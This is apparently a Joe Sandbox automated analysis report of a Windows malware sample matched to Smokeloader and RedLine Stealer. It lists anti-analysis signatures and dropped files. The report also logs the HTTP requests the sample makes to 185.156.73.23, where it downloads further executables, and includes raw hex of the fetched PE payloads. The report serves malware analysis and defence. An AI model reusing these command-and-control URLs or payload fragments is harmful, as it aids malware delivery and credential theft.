Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
zmTSHkabY6.exe

Overview

General Information

Sample name:zmTSHkabY6.exe
renamed because original name is a hash value
Original sample name:cab7af24073c5c1c62a2957dd5983c98.exe
Analysis ID:1578897
MD5:cab7af24073c5c1c62a2957dd5983c98
SHA1:a41a42e84999503cf76b04edefe3c37f87023285
SHA256:83709123b921be43ef4f8bcab88738b7e3f6b810fb443da8f447a287fa5d86ae
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • zmTSHkabY6.exe (PID: 2424 cmdline: "C:\Users\user\Desktop\zmTSHkabY6.exe" MD5: CAB7AF24073C5C1C62A2957DD5983C98)
    • WerFault.exe (PID: 4820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 1496 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1378:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: zmTSHkabY6.exeAvira: detected
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exeReversingLabs: Detection: 75%
Multi AV Scanner detection for submitted file
Source: zmTSHkabY6.exeVirustotal: Detection: 56%Perma Link
Source: zmTSHkabY6.exeReversingLabs: Detection: 42%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: zmTSHkabY6.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_004034C0 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_004034C0
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E83727 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,0_2_00E83727
Source: zmTSHkabY6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:23:56 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 0
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 20 Dec 2024 15:23:59 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: unknownTCP traffic detected without corresponding DNS query: 185.156.73.23
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: dHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /soft/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: sHost: 185.156.73.23Connection: Keep-AliveCache-Control: no-cache
Source: zmTSHkabY6.exe, 00000000.00000002.3223329343.00000000055F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/add?substr=mixtwo&s=three&sub=emp
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/download
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/downloadVMj
Source: zmTSHkabY6.exe, 00000000.00000002.3223329343.00000000055F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/dll/key
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2582270307.00000000056D8000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2546745947.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2773900858.00000000056D9000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download
Source: zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download00
Source: zmTSHkabY6.exe, 00000000.00000003.2491315087.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download4
Source: zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2644398463.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2617109524.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/download://1H
Source: zmTSHkabY6.exe, 00000000.00000003.2491315087.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2429953901.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadJ
Source: zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2644398463.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2617109524.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2681187095.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadZ
Source: zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadb
Source: zmTSHkabY6.exe, 00000000.00000003.2546745947.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2526387694.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadt
Source: zmTSHkabY6.exe, 00000000.00000003.2773777883.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2751522226.0000000005834000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2716404410.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/files/downloadx
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E55000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2831266370.000000000569F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download$MX
Source: zmTSHkabY6.exe, 00000000.00000003.2881735565.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/download://1H
Source: zmTSHkabY6.exe, 00000000.00000003.2881735565.0000000005834000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/downloadV
Source: zmTSHkabY6.exe, 00000000.00000002.3220957858.0000000000E37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.156.73.23/soft/downloadtM
Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
